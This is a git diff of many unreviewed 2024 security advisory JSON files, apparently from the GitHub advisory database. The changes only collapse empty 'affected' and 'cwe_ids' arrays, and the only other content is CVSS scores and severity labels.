b/advisories/unreviewed/2024/09/GHSA-6879-gf6q-3qmj/GHSA-6879-gf6q-3qmj.json index 5ef0a29e323..931fcce3c54 100644 --- a/advisories/unreviewed/2024/09/GHSA-6879-gf6q-3qmj/GHSA-6879-gf6q-3qmj.json +++ b/advisories/unreviewed/2024/09/GHSA-6879-gf6q-3qmj/GHSA-6879-gf6q-3qmj.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/09/GHSA-735f-p4wh-56vp/GHSA-735f-p4wh-56vp.json b/advisories/unreviewed/2024/09/GHSA-735f-p4wh-56vp/GHSA-735f-p4wh-56vp.json index dffb853fb8e..3356184a210 100644 --- a/advisories/unreviewed/2024/09/GHSA-735f-p4wh-56vp/GHSA-735f-p4wh-56vp.json +++ b/advisories/unreviewed/2024/09/GHSA-735f-p4wh-56vp/GHSA-735f-p4wh-56vp.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/09/GHSA-735p-552j-x6p3/GHSA-735p-552j-x6p3.json b/advisories/unreviewed/2024/09/GHSA-735p-552j-x6p3/GHSA-735p-552j-x6p3.json index 758d5285382..bd26740ff66 100644 --- a/advisories/unreviewed/2024/09/GHSA-735p-552j-x6p3/GHSA-735p-552j-x6p3.json +++ b/advisories/unreviewed/2024/09/GHSA-735p-552j-x6p3/GHSA-735p-552j-x6p3.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/09/GHSA-74p7-53wh-h625/GHSA-74p7-53wh-h625.json b/advisories/unreviewed/2024/09/GHSA-74p7-53wh-h625/GHSA-74p7-53wh-h625.json index e66d014c659..c84b1ee28fc 100644 --- a/advisories/unreviewed/2024/09/GHSA-74p7-53wh-h625/GHSA-74p7-53wh-h625.json +++ b/advisories/unreviewed/2024/09/GHSA-74p7-53wh-h625/GHSA-74p7-53wh-h625.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -31,9 +29,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2024/09/GHSA-7c3x-gh76-g622/GHSA-7c3x-gh76-g622.json b/advisories/unreviewed/2024/09/GHSA-7c3x-gh76-g622/GHSA-7c3x-gh76-g622.json index b97ed739778..7203c17edbb 100644 --- a/advisories/unreviewed/2024/09/GHSA-7c3x-gh76-g622/GHSA-7c3x-gh76-g622.json +++ b/advisories/unreviewed/2024/09/GHSA-7c3x-gh76-g622/GHSA-7c3x-gh76-g622.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/09/GHSA-93r2-j783-g4wf/GHSA-93r2-j783-g4wf.json b/advisories/unreviewed/2024/09/GHSA-93r2-j783-g4wf/GHSA-93r2-j783-g4wf.json index 5de1b9d6feb..a9e65a91eee 100644 --- a/advisories/unreviewed/2024/09/GHSA-93r2-j783-g4wf/GHSA-93r2-j783-g4wf.json +++ b/advisories/unreviewed/2024/09/GHSA-93r2-j783-g4wf/GHSA-93r2-j783-g4wf.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -27,9 +25,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2024/09/GHSA-96j7-6x53-7368/GHSA-96j7-6x53-7368.json b/advisories/unreviewed/2024/09/GHSA-96j7-6x53-7368/GHSA-96j7-6x53-7368.json index c80161e3f62..119a60fe92c 100644 --- a/advisories/unreviewed/2024/09/GHSA-96j7-6x53-7368/GHSA-96j7-6x53-7368.json +++ b/advisories/unreviewed/2024/09/GHSA-96j7-6x53-7368/GHSA-96j7-6x53-7368.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -27,9 +25,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2024/09/GHSA-97rq-m5jx-vcxq/GHSA-97rq-m5jx-vcxq.json b/advisories/unreviewed/2024/09/GHSA-97rq-m5jx-vcxq/GHSA-97rq-m5jx-vcxq.json index 1fd8d3b4a5d..0639150d1bc 100644 --- a/advisories/unreviewed/2024/09/GHSA-97rq-m5jx-vcxq/GHSA-97rq-m5jx-vcxq.json +++ b/advisories/unreviewed/2024/09/GHSA-97rq-m5jx-vcxq/GHSA-97rq-m5jx-vcxq.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:P/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -27,9 +25,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "LOW", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2024/09/GHSA-9g9q-cf56-cfh9/GHSA-9g9q-cf56-cfh9.json b/advisories/unreviewed/2024/09/GHSA-9g9q-cf56-cfh9/GHSA-9g9q-cf56-cfh9.json index fd4367fcd88..200b4129287 100644 --- a/advisories/unreviewed/2024/09/GHSA-9g9q-cf56-cfh9/GHSA-9g9q-cf56-cfh9.json +++ b/advisories/unreviewed/2024/09/GHSA-9g9q-cf56-cfh9/GHSA-9g9q-cf56-cfh9.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -35,9 +33,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2024/09/GHSA-9jxw-6cwc-fv29/GHSA-9jxw-6cwc-fv29.json b/advisories/unreviewed/2024/09/GHSA-9jxw-6cwc-fv29/GHSA-9jxw-6cwc-fv29.json index 0587ddfc520..6b09f41f386 100644 --- a/advisories/unreviewed/2024/09/GHSA-9jxw-6cwc-fv29/GHSA-9jxw-6cwc-fv29.json +++ b/advisories/unreviewed/2024/09/GHSA-9jxw-6cwc-fv29/GHSA-9jxw-6cwc-fv29.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -31,9 +29,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2024/09/GHSA-9rg3-9338-mwcv/GHSA-9rg3-9338-mwcv.json b/advisories/unreviewed/2024/09/GHSA-9rg3-9338-mwcv/GHSA-9rg3-9338-mwcv.json index df0d342155e..226288f7ec3 100644 --- a/advisories/unreviewed/2024/09/GHSA-9rg3-9338-mwcv/GHSA-9rg3-9338-mwcv.json +++ b/advisories/unreviewed/2024/09/GHSA-9rg3-9338-mwcv/GHSA-9rg3-9338-mwcv.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:P/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -27,9 +25,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "LOW", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2024/09/GHSA-c5c4-5r7q-ccqv/GHSA-c5c4-5r7q-ccqv.json b/advisories/unreviewed/2024/09/GHSA-c5c4-5r7q-ccqv/GHSA-c5c4-5r7q-ccqv.json index 285e09c87b7..025983a5827 100644 --- a/advisories/unreviewed/2024/09/GHSA-c5c4-5r7q-ccqv/GHSA-c5c4-5r7q-ccqv.json +++ b/advisories/unreviewed/2024/09/GHSA-c5c4-5r7q-ccqv/GHSA-c5c4-5r7q-ccqv.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/09/GHSA-cmvv-gwr2-36xm/GHSA-cmvv-gwr2-36xm.json b/advisories/unreviewed/2024/09/GHSA-cmvv-gwr2-36xm/GHSA-cmvv-gwr2-36xm.json index 19c9e6c887a..97254319032 100644 --- a/advisories/unreviewed/2024/09/GHSA-cmvv-gwr2-36xm/GHSA-cmvv-gwr2-36xm.json +++ b/advisories/unreviewed/2024/09/GHSA-cmvv-gwr2-36xm/GHSA-cmvv-gwr2-36xm.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/09/GHSA-cw5r-673r-7ww3/GHSA-cw5r-673r-7ww3.json b/advisories/unreviewed/2024/09/GHSA-cw5r-673r-7ww3/GHSA-cw5r-673r-7ww3.json index a8c4e7930aa..01360eab825 100644 --- a/advisories/unreviewed/2024/09/GHSA-cw5r-673r-7ww3/GHSA-cw5r-673r-7ww3.json +++ b/advisories/unreviewed/2024/09/GHSA-cw5r-673r-7ww3/GHSA-cw5r-673r-7ww3.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -35,9 +33,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2024/09/GHSA-fgvw-2v52-jhfv/GHSA-fgvw-2v52-jhfv.json b/advisories/unreviewed/2024/09/GHSA-fgvw-2v52-jhfv/GHSA-fgvw-2v52-jhfv.json index 677842e5ec4..381bcedc985 100644 --- a/advisories/unreviewed/2024/09/GHSA-fgvw-2v52-jhfv/GHSA-fgvw-2v52-jhfv.json +++ b/advisories/unreviewed/2024/09/GHSA-fgvw-2v52-jhfv/GHSA-fgvw-2v52-jhfv.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:U/C:H/I:H/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/09/GHSA-grj2-m3x4-7f2m/GHSA-grj2-m3x4-7f2m.json b/advisories/unreviewed/2024/09/GHSA-grj2-m3x4-7f2m/GHSA-grj2-m3x4-7f2m.json index 1b149126dbc..01b4dd64b72 100644 --- a/advisories/unreviewed/2024/09/GHSA-grj2-m3x4-7f2m/GHSA-grj2-m3x4-7f2m.json +++ b/advisories/unreviewed/2024/09/GHSA-grj2-m3x4-7f2m/GHSA-grj2-m3x4-7f2m.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -35,9 +33,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2024/09/GHSA-gvw8-h5c5-pr3g/GHSA-gvw8-h5c5-pr3g.json b/advisories/unreviewed/2024/09/GHSA-gvw8-h5c5-pr3g/GHSA-gvw8-h5c5-pr3g.json index 8ed41b18108..7d5d6601ce2 100644 --- a/advisories/unreviewed/2024/09/GHSA-gvw8-h5c5-pr3g/GHSA-gvw8-h5c5-pr3g.json +++ b/advisories/unreviewed/2024/09/GHSA-gvw8-h5c5-pr3g/GHSA-gvw8-h5c5-pr3g.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -27,9 +25,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "CRITICAL", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2024/09/GHSA-gw53-chv8-4wr2/GHSA-gw53-chv8-4wr2.json b/advisories/unreviewed/2024/09/GHSA-gw53-chv8-4wr2/GHSA-gw53-chv8-4wr2.json index 4b8efbfc9e1..b371485b43f 100644 --- a/advisories/unreviewed/2024/09/GHSA-gw53-chv8-4wr2/GHSA-gw53-chv8-4wr2.json +++ b/advisories/unreviewed/2024/09/GHSA-gw53-chv8-4wr2/GHSA-gw53-chv8-4wr2.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -35,9 +33,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2024/09/GHSA-h498-88jq-wh8m/GHSA-h498-88jq-wh8m.json b/advisories/unreviewed/2024/09/GHSA-h498-88jq-wh8m/GHSA-h498-88jq-wh8m.json index 7c24db48a22..da0c9e98da7 100644 --- a/advisories/unreviewed/2024/09/GHSA-h498-88jq-wh8m/GHSA-h498-88jq-wh8m.json +++ b/advisories/unreviewed/2024/09/GHSA-h498-88jq-wh8m/GHSA-h498-88jq-wh8m.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/09/GHSA-h89v-mw4f-7wgj/GHSA-h89v-mw4f-7wgj.json b/advisories/unreviewed/2024/09/GHSA-h89v-mw4f-7wgj/GHSA-h89v-mw4f-7wgj.json index de8a5bb04fd..21e8a566969 100644 --- a/advisories/unreviewed/2024/09/GHSA-h89v-mw4f-7wgj/GHSA-h89v-mw4f-7wgj.json +++ b/advisories/unreviewed/2024/09/GHSA-h89v-mw4f-7wgj/GHSA-h89v-mw4f-7wgj.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -31,9 +29,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2024/09/GHSA-h9cp-5vvc-8wqc/GHSA-h9cp-5vvc-8wqc.json b/advisories/unreviewed/2024/09/GHSA-h9cp-5vvc-8wqc/GHSA-h9cp-5vvc-8wqc.json index ea6d8d4ad2b..cb82b0f285f 100644 --- a/advisories/unreviewed/2024/09/GHSA-h9cp-5vvc-8wqc/GHSA-h9cp-5vvc-8wqc.json +++ b/advisories/unreviewed/2024/09/GHSA-h9cp-5vvc-8wqc/GHSA-h9cp-5vvc-8wqc.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -31,9 +29,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2024/09/GHSA-hp6q-6g58-99wm/GHSA-hp6q-6g58-99wm.json b/advisories/unreviewed/2024/09/GHSA-hp6q-6g58-99wm/GHSA-hp6q-6g58-99wm.json index 9f9a998c93f..ad884e2ad14 100644 --- a/advisories/unreviewed/2024/09/GHSA-hp6q-6g58-99wm/GHSA-hp6q-6g58-99wm.json +++ b/advisories/unreviewed/2024/09/GHSA-hp6q-6g58-99wm/GHSA-hp6q-6g58-99wm.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/09/GHSA-hx98-qf58-hff9/GHSA-hx98-qf58-hff9.json b/advisories/unreviewed/2024/09/GHSA-hx98-qf58-hff9/GHSA-hx98-qf58-hff9.json index 1668869b680..75f2c49f348 100644 --- a/advisories/unreviewed/2024/09/GHSA-hx98-qf58-hff9/GHSA-hx98-qf58-hff9.json +++ b/advisories/unreviewed/2024/09/GHSA-hx98-qf58-hff9/GHSA-hx98-qf58-hff9.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -27,9 +25,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2024/09/GHSA-j962-w243-6g33/GHSA-j962-w243-6g33.json b/advisories/unreviewed/2024/09/GHSA-j962-w243-6g33/GHSA-j962-w243-6g33.json index bbc6f178376..8e960fcc13b 100644 --- a/advisories/unreviewed/2024/09/GHSA-j962-w243-6g33/GHSA-j962-w243-6g33.json +++ b/advisories/unreviewed/2024/09/GHSA-j962-w243-6g33/GHSA-j962-w243-6g33.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/09/GHSA-jpf3-j9x5-w3ff/GHSA-jpf3-j9x5-w3ff.json b/advisories/unreviewed/2024/09/GHSA-jpf3-j9x5-w3ff/GHSA-jpf3-j9x5-w3ff.json index 494b328841a..86ce555bd81 100644 --- a/advisories/unreviewed/2024/09/GHSA-jpf3-j9x5-w3ff/GHSA-jpf3-j9x5-w3ff.json +++ b/advisories/unreviewed/2024/09/GHSA-jpf3-j9x5-w3ff/GHSA-jpf3-j9x5-w3ff.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -27,9 +25,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2024/09/GHSA-jvcj-gmhm-rfx5/GHSA-jvcj-gmhm-rfx5.json b/advisories/unreviewed/2024/09/GHSA-jvcj-gmhm-rfx5/GHSA-jvcj-gmhm-rfx5.json index 7eb0549cea4..0cd43d0843c 100644 --- a/advisories/unreviewed/2024/09/GHSA-jvcj-gmhm-rfx5/GHSA-jvcj-gmhm-rfx5.json +++ b/advisories/unreviewed/2024/09/GHSA-jvcj-gmhm-rfx5/GHSA-jvcj-gmhm-rfx5.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:P/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -35,9 +33,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2024/09/GHSA-m4c2-8cgc-49gg/GHSA-m4c2-8cgc-49gg.json b/advisories/unreviewed/2024/09/GHSA-m4c2-8cgc-49gg/GHSA-m4c2-8cgc-49gg.json index 868aa127685..fb2fa0527dd 100644 --- a/advisories/unreviewed/2024/09/GHSA-m4c2-8cgc-49gg/GHSA-m4c2-8cgc-49gg.json +++ b/advisories/unreviewed/2024/09/GHSA-m4c2-8cgc-49gg/GHSA-m4c2-8cgc-49gg.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -55,9 +53,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2024/09/GHSA-m548-7rvw-m5fc/GHSA-m548-7rvw-m5fc.json b/advisories/unreviewed/2024/09/GHSA-m548-7rvw-m5fc/GHSA-m548-7rvw-m5fc.json index 9d1d5766ee4..755aff4e1e6 100644 --- a/advisories/unreviewed/2024/09/GHSA-m548-7rvw-m5fc/GHSA-m548-7rvw-m5fc.json +++ b/advisories/unreviewed/2024/09/GHSA-m548-7rvw-m5fc/GHSA-m548-7rvw-m5fc.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -39,9 +37,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2024/09/GHSA-m9g4-52vh-fwwv/GHSA-m9g4-52vh-fwwv.json b/advisories/unreviewed/2024/09/GHSA-m9g4-52vh-fwwv/GHSA-m9g4-52vh-fwwv.json index dda40222d12..d6dc97f2594 100644 --- a/advisories/unreviewed/2024/09/GHSA-m9g4-52vh-fwwv/GHSA-m9g4-52vh-fwwv.json +++ b/advisories/unreviewed/2024/09/GHSA-m9g4-52vh-fwwv/GHSA-m9g4-52vh-fwwv.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -35,9 +33,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2024/09/GHSA-m9p7-jwr6-3575/GHSA-m9p7-jwr6-3575.json b/advisories/unreviewed/2024/09/GHSA-m9p7-jwr6-3575/GHSA-m9p7-jwr6-3575.json index dd37faf495a..c642695c2d8 100644 --- a/advisories/unreviewed/2024/09/GHSA-m9p7-jwr6-3575/GHSA-m9p7-jwr6-3575.json +++ b/advisories/unreviewed/2024/09/GHSA-m9p7-jwr6-3575/GHSA-m9p7-jwr6-3575.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:L" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/09/GHSA-m9wp-vvgp-96h6/GHSA-m9wp-vvgp-96h6.json b/advisories/unreviewed/2024/09/GHSA-m9wp-vvgp-96h6/GHSA-m9wp-vvgp-96h6.json index 46f809bc8c7..a58ef9d30e9 100644 --- a/advisories/unreviewed/2024/09/GHSA-m9wp-vvgp-96h6/GHSA-m9wp-vvgp-96h6.json +++ b/advisories/unreviewed/2024/09/GHSA-m9wp-vvgp-96h6/GHSA-m9wp-vvgp-96h6.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:L" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/09/GHSA-p733-9rpx-xwcp/GHSA-p733-9rpx-xwcp.json b/advisories/unreviewed/2024/09/GHSA-p733-9rpx-xwcp/GHSA-p733-9rpx-xwcp.json index 098c3fd19da..91a0efec947 100644 --- a/advisories/unreviewed/2024/09/GHSA-p733-9rpx-xwcp/GHSA-p733-9rpx-xwcp.json +++ b/advisories/unreviewed/2024/09/GHSA-p733-9rpx-xwcp/GHSA-p733-9rpx-xwcp.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:L" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/09/GHSA-p863-p79f-qm33/GHSA-p863-p79f-qm33.json b/advisories/unreviewed/2024/09/GHSA-p863-p79f-qm33/GHSA-p863-p79f-qm33.json index 78f00d8bb69..1221d628873 100644 --- a/advisories/unreviewed/2024/09/GHSA-p863-p79f-qm33/GHSA-p863-p79f-qm33.json +++ b/advisories/unreviewed/2024/09/GHSA-p863-p79f-qm33/GHSA-p863-p79f-qm33.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/09/GHSA-pmc5-pcm8-42pf/GHSA-pmc5-pcm8-42pf.json b/advisories/unreviewed/2024/09/GHSA-pmc5-pcm8-42pf/GHSA-pmc5-pcm8-42pf.json index 5f53590954a..222580e5a7d 100644 --- a/advisories/unreviewed/2024/09/GHSA-pmc5-pcm8-42pf/GHSA-pmc5-pcm8-42pf.json +++ b/advisories/unreviewed/2024/09/GHSA-pmc5-pcm8-42pf/GHSA-pmc5-pcm8-42pf.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/09/GHSA-q47g-9jmw-5p5r/GHSA-q47g-9jmw-5p5r.json b/advisories/unreviewed/2024/09/GHSA-q47g-9jmw-5p5r/GHSA-q47g-9jmw-5p5r.json index d38a02aff3f..bdbdae522da 100644 --- a/advisories/unreviewed/2024/09/GHSA-q47g-9jmw-5p5r/GHSA-q47g-9jmw-5p5r.json +++ b/advisories/unreviewed/2024/09/GHSA-q47g-9jmw-5p5r/GHSA-q47g-9jmw-5p5r.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:L" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/09/GHSA-q7q2-gf23-qgjw/GHSA-q7q2-gf23-qgjw.json b/advisories/unreviewed/2024/09/GHSA-q7q2-gf23-qgjw/GHSA-q7q2-gf23-qgjw.json index 4bc4dfb42bf..d953cba803f 100644 --- a/advisories/unreviewed/2024/09/GHSA-q7q2-gf23-qgjw/GHSA-q7q2-gf23-qgjw.json +++ b/advisories/unreviewed/2024/09/GHSA-q7q2-gf23-qgjw/GHSA-q7q2-gf23-qgjw.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -35,9 +33,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2024/09/GHSA-q7q3-4cwr-583j/GHSA-q7q3-4cwr-583j.json b/advisories/unreviewed/2024/09/GHSA-q7q3-4cwr-583j/GHSA-q7q3-4cwr-583j.json index c8b07be25bc..527db2a1362 100644 --- a/advisories/unreviewed/2024/09/GHSA-q7q3-4cwr-583j/GHSA-q7q3-4cwr-583j.json +++ b/advisories/unreviewed/2024/09/GHSA-q7q3-4cwr-583j/GHSA-q7q3-4cwr-583j.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2024/09/GHSA-qcjx-5p37-v6hf/GHSA-qcjx-5p37-v6hf.json b/advisories/unreviewed/2024/09/GHSA-qcjx-5p37-v6hf/GHSA-qcjx-5p37-v6hf.json index 605ed0886cf..16345ee45fb 100644 --- a/advisories/unreviewed/2024/09/GHSA-qcjx-5p37-v6hf/GHSA-qcjx-5p37-v6hf.json +++ b/advisories/unreviewed/2024/09/GHSA-qcjx-5p37-v6hf/GHSA-qcjx-5p37-v6hf.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -35,9 +33,7 @@ } ], "database_specific": { - 